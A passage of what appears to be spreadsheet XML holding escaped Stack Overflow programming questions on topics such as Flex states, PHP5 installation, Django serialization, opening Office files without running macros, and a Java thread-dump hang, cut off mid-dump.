&amp;lt;script&amp;gt;
function blah(){
    //blackbird.debug("blah");
}
    var dummy = new Draggable("test", {scroll:window,scrollSensitivity: 20,scrollSpeed: 25, revert: true, onStart: onDragStart, onEnd: onDragEnd });
    var temp;
    function onDragStart(drgObj,mouseEvent){
    		temp = mouseEvent.target.onclick;
    		mouseEvent.target.onclick = function(e){
    			mouseEvent.target.onclick = temp;
    			return false;
    		}
    }
    function onDragEnd(drgObj,mouseEvent){
    }
&amp;lt;/script&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why does mx:states have trouble being resolved to a component implementation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every now and then I get an error when I set up states in an MXML file.  The error I get says that mx:states could not be resolved to a component implementation.&lt;/p&gt;
&lt;p&gt;I read, at the following url, that this issue is caused by extending components - that somehow throws off the compiler's ability to resolve mx:states.  I don't see why this should be the case, but I don't have any answer of my own.  I also can't necessarily make this approach work with all of my extended components.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://life.neophi.com/danielr/2007/01/could_not_resolve_to_a_compone.html" rel="nofollow"&gt;http://life.neophi.com/danielr/2007/01/could_not_resolve_to_a_compone.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The workaround I've come up with is to not use any namespace.
So, my code then looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;states&amp;gt;...&amp;lt;/states&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;rather than:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mx:states&amp;gt;...&amp;lt;/mx:states&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Making this stranger (at least, to me) is the fact that the children of the  tag -  - does not have this issue.  mx:states can not be resolved, but its child mx:State can.  And mx:SetProperty - a child of mx:State - is also resolved.&lt;/p&gt;
&lt;p&gt;Can anyone explain this, and/or offer a better solution to the problem than what I've come up with?&lt;/p&gt;
&lt;p&gt;Incidentally, I see the same issue with mx:transitions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make php5 on a machine running php4, without breaking anything</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know with python and a couple other languages there is a way to safely make install a newer generational version of a language onto a machine, but after digging through PHP5's configure &amp;amp; makefile the only thing I've seen is the prefix dir option and the ini scan path.&lt;/p&gt;
&lt;p&gt;Ideally I'd like php5 to have its own lib/bin subdirectories in /usr/local and then I can just put php5 after php4 in the path or make a symbolic link from the php5 binaries to php5-cli, php5-cgi, etc.   &lt;/p&gt;
&lt;p&gt;Also, am I missing anything dramatically bad here, the server in question is a legacy application server that's still somewhat busy and is due to be deprecated by June of 2009 but in the meantime the plan is to start updating parts with php5 code.&lt;/p&gt;
&lt;p&gt;Machine states:
CENTOS 5
PHP 4 was built from a source RPM outside of yum's control&lt;/p&gt;
&lt;p&gt;Most of php4 is in ambiguous directories:
/usr/{include,lib}/php &lt;/p&gt;
</t>
  </si>
  <si>
    <t>If I wanted to work using dates and time going millions of years into the past/future how would I do it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I wanted to work using dates and time going millions of years into the past/future how would I do it in C/C++/C#? &lt;/p&gt;
&lt;p&gt;For example say I was working on an algorithm to see if a comet was going to hit the earth? Are there commercial or open source libraries that do this?&lt;/p&gt;
&lt;p&gt;Most DateTime values only work for a few years. Unixes will run out in only 2038!.&lt;/p&gt;
&lt;p&gt;Tony&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why should you not use Number as a constructor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I entered this statement in JSLint:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var number = new Number(3);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And received the following message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Do not use Number as a constructor.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why is that? The statement is creating a number object, not a primitive value, so I don't see why using &lt;code&gt;new&lt;/code&gt; is a problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Thanks for all the responses. They've got me thinking further, so I posted a follow-up question &lt;a href="http://stackoverflow.com/questions/369424/question-about-objectmethod-in-javascript"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Thanks again for all the responses! They've been very helpful. I guess to sum up, in JavaScript, an Object type is not equal to another Object type, even when they have the exact same value, unless they are both the EXACT SAME object.&lt;/p&gt;
&lt;p&gt;In other words, in Matthew's example below, n1 == n2 is false because you are comparing two REFERENCES to two SEPARATE objects, but n1 == n1 is true because you are comparing references to the EXACT SAME object.&lt;/p&gt;
&lt;p&gt;So, while I now understand why using Number as a constructor can cause problems, I found you can use the valueOf property when comparing Number objects. &lt;/p&gt;
&lt;p&gt;In other words, n1.valueOf == n2.valueOf is true! (This is because you're comparing the return values of the valueOf FUNCTION, not the REFERENCES to the objects themselves.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to serialize a ModelForm object in Django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Django and the Google Web Toolkit (GWT) for my current project. I would like to pass a ModelForm instance to GWT via an Http response so that I can "chop" it up and render it as I please. My goal is to keep the form in sync with changes to my models.py file, yet increase control I have over the look of the form. However, the django classes for serialization, serializers and simplejson, cannot serialize a ModelForm. Neither can cPickle. What are my alternatives? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex: invalidateData</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've trouble getting my components to update when the params has changed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package mycompany
{
    import flash.events.Event;
    import mx.events.SliderEvent;
    import mx.controls.HSlider;
    import mx.controls.sliderClasses.Slider;
    public class FromToSlider extends HSlider
    {
        /* from: */
        private var _from:int;
        [Bindable]
        public function get from():int
        {
            return _from;
        }
        public function set from(value:int):void
        {
            this._from = value;
            this.values[0] = value;
            invalidateProperties();
        }
        /* //from */
        /* to: */
        private var _to:int;
        [Bindable]
        public function get to():int
        {
            return _to;
        }
        public function set to(value:int):void
        {
            this._to = value;
            this.values[1] = value;
        }
        /* //to */
        override public function initialize():void
        {
            super.initialize();
            addEventListener(SliderEvent.CHANGE, handleChange, false, 0, true);
        }
        protected function handleChange(event:SliderEvent):void
        {
            var ct:Slider=Slider(event.currentTarget);
            this.from = ct.values[0];
            this.to = ct.values[1];
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I set "from" and "to" the thumbs aren't updating. I've tried invalidateProperties but that didn't work. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I map a hibernate Timestamp to a MySQL BIGINT?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Hibernate 3.x, MySQL 4.1.20 with Java 1.6. I am mapping a Hibernate Timestamp to a MySQL TIMESTAMP. So far so good.  The problem is that MySQL stores the TIMESTAMP in seconds and discards the milliseconds and I now need millisecond precision.  I figure I can use a BIGINT instead of TIMESTAMP in my table and convert the types in my Java code.  I'm trying to figure out if there is a better way of doing this using hibernate, mysql, JDBC or some combination so I can still use date functions in my HSQL and/or SQL queries?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Manipulate a file in code (VB.NET) without executing the file's macros</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Excel file that has a bunch of VBA and macro code in it.  When I open the file in Excel I can choose not to 'enable' them - so the values in the fields all stay as they were during the last save.  I need to manipulate the values as they were last saved - so I don't want the macros (which look at the current date and update values accordingly) to run.&lt;/p&gt;
&lt;p&gt;When I open it via our dot net code: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim oxlRep As Excel.Application
Dim oWBRep As Excel.Workbook
Dim oSheetRep As Excel.Worksheet
Dim oRngRep As Excel.Range
oxlRep.Open(path)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the vb code runs - throwing off the values.  I've been looking for a way to open it without macros, or in 'secure' mode where the macros aren't run.  If I simply double click the file and don't choose to enable macros the values are all there as I want them.  &lt;/p&gt;
&lt;p&gt;Usually we run this code within the month that the files are created, so we haven't seen this problem in the 3 or 4 years that it has been working.  Now I need to go back to some of the old files and run some archival code...  &lt;/p&gt;
&lt;p&gt;Anyone have a suggestion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2005: How to not have VS try to parse text file resources as html?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have included a resource in my Visual Studio 2005 solution that was a file on the hard drive. It is a text file, that contains text, and has a &lt;strong&gt;.htm&lt;/strong&gt; extension.&lt;/p&gt;
&lt;p&gt;For months it worked fine, until I wanted to edit the contents of the text file. Suddenly Visual Studio insists on syntax checking the file as though it were an HTML file - when it is not.&lt;/p&gt;
&lt;p&gt;i would really rather not workaround this bug in Visual Studio by forcing the file to be named:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SomeFilename.htm.VSbug.doNotRemove
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;rather than&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SomeFilename.htm
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not everything that uses the file is Visual Studio, and it would be a shame to force everyone to change because of issues with Visual Studio.&lt;/p&gt;
&lt;p&gt;Even more to the point - what did i originally do so that VS would (correctly) ignore randomly added text files - and how do i do that again?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Update One&lt;/h2&gt;
&lt;p&gt;Since some people are, of course, curious - here is the contents of the file:&lt;/p&gt;
&lt;p&gt;SomeFilename.htm&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    "http://www.w3.org/TR/html4/strict.dtd"&amp;gt; 
&amp;lt;HTML&amp;gt;
&amp;lt;HEAD&amp;gt;
    &amp;lt;TITLE&amp;gt;New Document&amp;lt;/TITLE&amp;gt;
    &amp;lt;META http-equiv="X-UA-Compatible" content="IE=edge"&amp;gt;
    &amp;lt;META http-equiv="Content-Type" content="text/html; charset=UTF-8"&amp;gt; 
&amp;lt;/HEAD&amp;gt;
&amp;lt;BODY style="margin: 0 auto"&amp;gt;
    &amp;lt;DIV style="text-align:center;"&amp;gt;
    	&amp;lt;A href="%PANELLINK%" target="_blank"&amp;gt;&amp;lt;IMG border="0" src="%PANELIMAGE%" style="%IMAGESTYLE%"&amp;gt;&amp;lt;/A&amp;gt;&amp;lt;BR&amp;gt;
    	%CAPTIONTEXT%
    &amp;lt;/DIV&amp;gt;
&amp;lt;/BODY&amp;gt;
&amp;lt;/HTML&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, the file does not contain html. Don't forget - the file's contents are beside the point.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h1&gt;Answer&lt;/h1&gt;
&lt;p&gt;Editing the file through Visual Studio is what triggers Visual Studio to think it has some jurisdiction over the contents of the resource file. &lt;/p&gt;
&lt;p&gt;Deleting the file and re-adding it, as well as only editing the resource text file outside of VS, ensures that VS will not try to parse the file's contents.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Example of setting up a name entry box for high score submission on iPhone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have an example of setting up a text field where users can enter their name and/or email address to submit it online to a high score database?  I would like to have 
it be similar to the form that pops up when you attempt to download something from the AppStore, where you put in your email and password then can hit OK or Cancel.  I can handle all the submission code and the server side processing at the website, but I just have had a hell of a time getting the text field and buttons setup properly.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>java append to file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I googled for this for a while but can't seem to find it and it should be easy. I want to append a CR to then end of an XML file that I am creating with a Transformer. Is there a way to do this&gt;&lt;/p&gt;
&lt;p&gt;I tried the following but this resulted in a blank file?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
Transformer xformer = TransformerFactory.newInstance().newTransformer();
xformer.setOutputProperty(OutputKeys.DOCTYPE_SYSTEM, "file:///ReportWiz.dtd");
xformer.transform(source, result);
OutputStream writer = new FileOutputStream(file);
Byte b = '\n';
writer.write(b);
writer.close();&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to create a form on its own thread and keep it open throughout application lifetime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a little testing component and am running into a problem&lt;/p&gt;
&lt;p&gt;Basically the component is a decorator on a class that controls all access to the database, it creates a form with a two buttons on it: "Simulate Lost Connection" and "Reconnect".  Press the button, and instead of letting function calls pass through the wrapper starts throwing NoConnectionException()s nice and simple, and real helpful for testing.&lt;/p&gt;
&lt;p&gt;The problem is that this particular application when it detects a lost connection raises a modal dialog box "connection lost!" that sits there until the connection is regained.  Because it is modal I cannot press my nifty button to simulate regained connectivity.&lt;/p&gt;
&lt;p&gt;What I need to do therefore is to run my little testing form in a different thread.  I'm not absolutely sure how to do that.  I tried&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Thread(
  new ThreadStart(
    (Action)delegate {_form.Start();}
  )
).Start();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the thread closes as soon as the method returns so the form never shows up except for an instant.&lt;/p&gt;
&lt;p&gt;Any idea how I go about achieving what I want?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I run Perl scripts using FastCGI on Nginx?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I am following this guide: &lt;a href="http://technotes.1000lines.net/?p=23"&gt;http://technotes.1000lines.net/?p=23&lt;/a&gt; and I am going through the steps. I have a VPN (slicehost.com) with Debian Etch, serving a website (static so far) with nginx. I used wget to download FastCGI and I did the usual make make install routine. &lt;/p&gt;
&lt;p&gt;So I guess since FastCGI can't normally run CGI scripts you have to use some type of perl wrapper to interpret the perl.&lt;/p&gt;
&lt;p&gt;Now I run this script&lt;/p&gt;
&lt;p&gt;&lt;a href="http://technotes.1000lines.net/fastcgi-wrapper.pl"&gt;http://technotes.1000lines.net/fastcgi-wrapper.pl&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and I run into the exact same problem that a person ran into on the page that the script was submitted: &lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.ruby-forum.com/topic/145858"&gt;http://www.ruby-forum.com/topic/145858&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;(I'm not a ruby person and there is nothing ruby oriented in there)&lt;/p&gt;
&lt;p&gt;I keep getting a &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# bind/listen: No such file or directory
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I have no idea how to proceed. I would appreciate any help and I can give any more details that anyone would need.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I programmatically open a MS Word document without invoking the Document_Open macro</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use Office Automation to open a word document.  The problem is that I would like to open it without invoking the Document_Open macro.  Is there a way to do this?&lt;/p&gt;
&lt;p&gt;The relevant line below is wordApp.Documents.Open()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Imports Microsoft.Office.Interop
Public Class WordFunctions
  Public Shared Function ConvertToDoc(ByVal file As String) As Boolean
    Dim wordDoc As Word.Document
    Dim wordApp As Word.Application
    Try
        wordApp = CreateObject("Word.Application", "")
    Catch ex As Exception
        Return False
    End Try
    Try
        wordApp.Caption = "Automated Word Instance"
        wordApp.DisplayAlerts = Word.WdAlertLevel.wdAlertsNone
        wordDoc = wordApp.Documents.Open(FileName:=file, Visible:=False, ConfirmConversions:=False)
        wordDoc.SaveAs(FileName:=file + ".doc", FileFormat:=Word.WdSaveFormat.wdFormatDocument)
        wordDoc.Activate()
        wordDoc.Close()
        Return True
    Catch ex As Exception
        Return False
    Finally
        wordApp.Quit(SaveChanges:=False)
    End Try
  End Function
End Class
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Simple Interpreted Language Design &amp; Implementation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need some resources for implementing a simple virtual machine and interpreted language.  Something that is pratical is most useful.  I have read the Virtual Machine Implementation book and found that it is quite old and doesn't represent the vms I see today.  Also if someone know of a fairly simplistic language that would be great as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to customize error display in powershell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find the standard Powershell display of errors (red text, multi-line display) a bit distracting. Is it possible to customize this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Measuring Response Times In Combination With WatiN</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a tool that I could potentially use in combination with &lt;a href="http://watin.sourceforge.net/" rel="nofollow"&gt;WatiN&lt;/a&gt; that would allow me to more or less measure both the response time of an interaction and also the filesize of the same interaction in combination with WatiN. Let's say, I make a google request. That's great, we've all seen that example, but what if I want to see how long that request took and also what was downloaded and how long it took. Does anyone know any tools that can be used programmatically to do this? Sure, there are many tools such as &lt;a href="http://www.charlesproxy.com/" rel="nofollow"&gt;Charles&lt;/a&gt;, &lt;a href="http://www.fiddlertool.com/fiddler/" rel="nofollow"&gt;Fiddler 2&lt;/a&gt; and &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/1843" rel="nofollow"&gt;Firebug&lt;/a&gt; that allow you to do this via an interface, but I'd like to be able to automatically generate reports and the like based on this tool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why git can't remember my passphrase under Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just start using git and i can't get it to remember my passphrase I'm using cmd.exe elevated and my git host is github and i have create a ssh key like that guide on github&lt;/p&gt;
&lt;p&gt;but i still get  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*\subnus.mvc&amp;gt;git push origin master
Enter passphrase for key '/c/Users/Subnus/.ssh/id_rsa':
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I include css files from an MVC partial control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using ASP.NET MVC and I have a partial control that needs a particular CSS &amp;amp; JS file included.  Is there a way to make the parent page render the &lt;code&gt;script&lt;/code&gt; and &lt;code&gt;link&lt;/code&gt; tags in the 'head' section of the page, rather than just rendering them inline in the partial contol?&lt;/p&gt;
&lt;p&gt;To clarify the control that I want to include the files from is being rendered from a View with &lt;code&gt;Html.RenderPartial&lt;/code&gt; and so cannot have server-side content controls on it. I want to be able to include the files in the html &lt;code&gt;head&lt;/code&gt; section so as to avoid validation issues.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I ORDER BY an arithmetic express in SQLAlchemy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I translate something like this into SQLAlchemy?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT (a * b) - (x + y) / z AS result
FROM table
ORDER BY result
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to debug COM object in Visual Studio 6.0 that is created in an ASP page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an old C++ COM component which has to stay in Visual Studio 6.0 format.  I can't for the life of me figure out how to debug the code in the actual COM component.&lt;/p&gt;
&lt;p&gt;I'm able to build it in debug mode, add breakpoints and attach it to the dllhost.exe process, but the Visual Studio environment will only show me the disassembly from dllhost.exe and not my source code (It also doesn't stop on the breakpoints).&lt;/p&gt;
&lt;p&gt;I remember a while ago there was a way to make IIS (or inetinfo.exe) the &lt;em&gt;target&lt;/em&gt; of your debug action (i.e. when Visual Studio 6.0 asks you for the executable to launch your dll) and IIS would run in a single process mode.  There was a registry key you needed to change, but googling hasn't helped.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java get JPanel Components</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JPanel full of JTextFields...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i=0; i&amp;lt;maxPoints; i++) {
    JTextField textField = new JTextField();
    points.add(textField);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I later get the JTextFields in that JPanel? Like if I want their values with  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TextField.getText();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>in SQL, or Django ORM, what's the conventional way to have an ordered one-to-many?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I wanted to have a project, and one-to-many with to-do items, and wanted to re-order the to-do items arbitrarily? &lt;/p&gt;
&lt;p&gt;In the past, I've added a numbered order field, and when someone wants to change the order, had to update all the items with their new order numbers.  This is probably the worst approach, since it's not atomic &amp;amp; required several updates.&lt;/p&gt;
&lt;p&gt;I notice Django has a multi-valued CommaSeparatedIntegerField which could contain the order by storing the ordered keys to the items in the to-do items table right in one field of the project table.&lt;/p&gt;
&lt;p&gt;I've pondered a dewey decimal system where if I wanted to take item 3 and put it between 1 and 2 I would change it's order number to 1.5.&lt;/p&gt;
&lt;p&gt;Something tells me there's an easier option that I'm missing though...&lt;/p&gt;
&lt;p&gt;How would you give order to a one-to-many relationship?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTTP 403 Error while accessing web service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im trying to access a web service from a remote computer. I managed to access the web service from the browser. But Im getting HTTP 403 when I try to call the web service from the application.&lt;/p&gt;
&lt;p&gt;Any idea why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inheriting from ViewPage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to inherit from both ViewPage and ViewPage&amp;lt;T&amp;gt;?? Or do I have to implement both. Currently this is what I have for ViewPage. Do i need to repeat myself and do the same for ViewPage&amp;lt;T&amp;gt;??&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public class BaseViewPage : ViewPage
    {
        public bool LoggedIn
        {
            get
            {
                if (ViewContext.Controller is BaseController)
                    return ((BaseController)ViewContext.Controller).LoggedOn;
                else
                    return false;
            }
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to stop Gmail from marking mails sent by my web app as spam?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple web application that provides daily financial data. Users subscribe, and we send them an email every day. However, Gmail is marking all of our emails as spam. What should we be looking out for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Differences between Python game libraries Pygame and Pyglet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've had some experience with Pygame, but there seems to be a lot of buzz around Pyglet these days.&lt;/p&gt;
&lt;p&gt;How do these two libraries compare? What would be the advantage of using one over the other, both in features and ease of use?&lt;/p&gt;
&lt;p&gt;Finally, would you say that one is more Pythonic than the other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java 6 JVM Hang</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Apologies for the long post, but I wonder if I could get some more eyeballs on this before I submit a bug report to Sun.&lt;/p&gt;
&lt;p&gt;JVM: 6u11&lt;br&gt;
O/S: Windows XP SP3&lt;br&gt;
Hardware: AMD Athlon 64 X2 4600+ @ 2.41GHz, with 3.25 GB RAM.&lt;/p&gt;
&lt;p&gt;I believe I have encountered a fault in the JVM where no thread is given a monitor.  In the following thread traces, the monitor &lt;code&gt;&amp;lt;0x12a8f9f8&amp;gt;&lt;/code&gt; was acquired by &lt;code&gt;RelayedMessages-0000000001&lt;/code&gt;, which ended up waiting on it; that thread was subsequently notified.  However, even though all of the threads listed are contending for the monitor, none are getting it.&lt;/p&gt;
&lt;p&gt;I promise the thread dump is complete for every thread which refers to monitor &lt;code&gt;&amp;lt;0x12a8f9f8&amp;gt;&lt;/code&gt;.  The dump was obtained using Java VisualVM, three times over a period of 16 hours, and shown to be consistent each time (these threads were unchanged).&lt;/p&gt;
&lt;p&gt;Does anyone disagree with my assessment that the JVM is failing to deliver the monitor to any of the eligible threads, when it should deliver it to one of them?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"RelayedMessages-0000000001" daemon prio=6 tid=0x03694400 nid=0x1750 waiting for monitor entry [0x05e1f000..0x05e1fc94]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at java.lang.Object.wait(Native Method)
    at com.companyremoved.thd.EzWaiter.ezWait(EzWaiter.java:249)
    - locked &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.waitWithinMessage(IsolatedObject.java:352)
    - locked &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.system.coms.ComsSender.waitForAvailablePipe(ComsSender.java:219)
    at com.companyremoved.system.coms.ComsSender.sendObject(ComsSender.java:185)
    at com.companyremoved.system.coms.ComsSender.processIocMessage(ComsSender.java:98)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:311)
    - locked &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.iocMessage(IsolatedObject.java:265)
    at com.companyremoved.ioc.IocTarget.iocMessage(IocTarget.java:138)
    at com.companyremoved.ioc.IocBinding.iocMessage(IocBinding.java:105)
    at com.companyremoved.system.coms.ComsSender$Messages.sendObject(ComsSender.java:333)
    at com.companyremoved.system.coms.ComsSender$Messages.sendObject(ComsSender.java:316)
    at com.companyremoved.system.coms.RelayedMessage.run(RelayedMessage.java:104)
    - locked &amp;lt;0x130fe8e0&amp;gt; (a com.companyremoved.system.coms.RelayedMessage)
    at com.companyremoved.thd.RunQueue.runEntry(RunQueue.java:293)
    at com.companyremoved.thd.RunQueue.run(RunQueue.java:273)
    at java.lang.Thread.run(Unknown Source)
   Locked ownable synchronizers:
    - None
"ScbPipe Writer" daemon prio=6 tid=0x4fff0c00 nid=0xf14 waiting for monitor entry [0x0594f000..0x0594fc14]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:293)
    - waiting to lock &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.iocMessage(IsolatedObject.java:265)
    at com.companyremoved.ioc.IocTarget.iocMessage(IocTarget.java:138)
    at com.companyremoved.coms.stm.ioc.ComsPipe$Receiver.scbPipeDefaultProcessor(ComsPipe.java:403)
    at com.companyremoved.scb.ScbPipe.processObject(ScbPipe.java:915)
    - locked &amp;lt;0x131a4ea0&amp;gt; (a java.lang.Object)
    at com.companyremoved.scb.ScbPipe.writerRun(ScbPipe.java:817)
    at com.companyremoved.scb.ScbPipe.run(ScbPipe.java:728)
    at java.lang.Thread.run(Unknown Source)
   Locked ownable synchronizers:
    - None
"ScbPipe Writer" daemon prio=6 tid=0x4c647400 nid=0xe00 waiting for monitor entry [0x059ef000..0x059efb94]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:293)
    - waiting to lock &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.iocMessage(IsolatedObject.java:265)
    at com.companyremoved.ioc.IocTarget.iocMessage(IocTarget.java:138)
    at com.companyremoved.coms.stm.ioc.ComsPipe$Receiver.scbPipeDefaultProcessor(ComsPipe.java:403)
    at com.companyremoved.scb.ScbPipe.processObject(ScbPipe.java:915)
    - locked &amp;lt;0x13188bb8&amp;gt; (a java.lang.Object)
    at com.companyremoved.scb.ScbPipe.writerRun(ScbPipe.java:817)
    at com.companyremoved.scb.ScbPipe.run(ScbPipe.java:728)
    at java.lang.Thread.run(Unknown Source)
   Locked ownable synchronizers:
    - None
"ScbPipe Writer" daemon prio=6 tid=0x035f7800 nid=0x1130 waiting for monitor entry [0x0726f000..0x0726fc94]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:293)
    - waiting to lock &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.iocMessage(IsolatedObject.java:265)
    at com.companyremoved.ioc.IocTarget.iocMessage(IocTarget.java:138)
    at com.companyremoved.coms.stm.ioc.ComsPipe$Receiver.scbPipeDefaultProcessor(ComsPipe.java:403)
    at com.companyremoved.scb.ScbPipe.processObject(ScbPipe.java:915)
    - locked &amp;lt;0x12a8a478&amp;gt; (a java.lang.Object)
    at com.companyremoved.scb.ScbPipe.writerRun(ScbPipe.java:817)
    at com.companyremoved.scb.ScbPipe.run(ScbPipe.java:728)
    at java.lang.Thread.run(Unknown Source)
   Locked ownable synchronizers:
    - None
"IOC Signals-0000000001" daemon prio=6 tid=0x03673000 nid=0x1434 waiting for monitor entry [0x0415f000..0x0415fd94]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at com.companyremoved.ioc.IsolatedObject.deliver(IsolatedObject.java:293)
    - waiting to lock &amp;lt;0x12a8f9f8&amp;gt; (a com.companyremoved.system.coms.ComsSender)
    at com.companyremoved.ioc.IsolatedObject.iocMessage(IsolatedObject.java:265)
